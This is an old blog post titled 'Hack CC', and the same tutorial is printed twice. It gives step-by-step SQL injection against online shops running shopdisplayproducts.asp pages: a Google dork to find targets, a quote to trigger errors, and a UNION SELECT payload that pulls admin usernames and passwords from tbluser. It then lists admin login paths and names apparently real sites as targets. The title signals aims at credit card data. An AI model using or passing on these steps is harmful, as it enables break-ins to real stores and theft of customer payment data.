Custom Search
Thursday, February 5, 2009
Wednesday, February 4, 2009
Hack CC
first go to google.com and put this
inurl:/shopdisplayproducts.asp
ok, now we find some site with shopdisplayproducts.asp
let see some site
Code:
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
ok … now we put on end of link this sign ‘
now link look like this
Code:
http://www.globalasp.org.uk/store/shopdisp….asp?id=14
'
and we get error
products
microsoft jet database engine error ‘80040e14'
syntax error in string in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14' and hide=0 order by specialoffer desc,cname’.
/store/shop$db.asp, line 467
if we see this error then is hackable ) !!!
ok … now we removed ‘
Code:
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
and on this add this
%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,
30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50%20from%20tbluser’
link now is
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
and put it in the browser we get the same error !!!
ok … now you see this numbers …
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50
now we removed ,50
and we now test
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
the same error and now we removed and removed number, and when we don’t see this error we must see some site, on this server correct number for
exploit is -> 47 <-
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
—> this you see 47 is the end number
ok now we put this in browser and don’t see error we see some laptops
ok … now we find on that site numbers 3 and 4
they are small
when we find that numbers we put where are 3 and 4 in link this code line
fldusername,fldpassword
now explotable link is this
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
and look where was 3 and 4 number now there are username and password for
login in shopadmin , now we are going to this link
http://www.globalasp.org.uk/store/colours$config.a sp
there is login for shopadmin and we login !!!
this are path where can be shopadmins too
shopadmin.asp —-> this or … with 1
shopadmin1.asp —-> this is in 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp
Code:
http://www.publishamerica.com/shopping/
... 20tbluser'
Code:
http://msponline.net/shopping/shopadmin.asp
Love Is Blind.......
inurl:/shopdisplayproducts.asp
ok, now we find some site with shopdisplayproducts.asp
let see some site
Code:
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
ok … now we put on end of link this sign ‘
now link look like this
Code:
http://www.globalasp.org.uk/store/shopdisp….asp?id=14
'
and we get error
products
microsoft jet database engine error ‘80040e14'
syntax error in string in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14' and hide=0 order by specialoffer desc,cname’.
/store/shop$db.asp, line 467
if we see this error then is hackable ) !!!
ok … now we removed ‘
Code:
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
and on this add this
%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,
30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50%20from%20tbluser’
link now is
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
and put it in the browser we get the same error !!!
ok … now you see this numbers …
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50
now we removed ,50
and we now test
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
the same error and now we removed and removed number, and when we don’t see this error we must see some site, on this server correct number for
exploit is -> 47 <-
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
—> this you see 47 is the end number
ok now we put this in browser and don’t see error we see some laptops
ok … now we find on that site numbers 3 and 4
they are small
when we find that numbers we put where are 3 and 4 in link this code line
fldusername,fldpassword
now explotable link is this
Code:
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
and look where was 3 and 4 number now there are username and password for
login in shopadmin , now we are going to this link
http://www.globalasp.org.uk/store/colours$config.a sp
there is login for shopadmin and we login !!!
this are path where can be shopadmins too
shopadmin.asp —-> this or … with 1
shopadmin1.asp —-> this is in 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp
Code:
http://www.publishamerica.com/shopping/
... 20tbluser'
Code:
http://msponline.net/shopping/shopadmin.asp
Love Is Blind.......
Subscribe to:
Posts (Atom)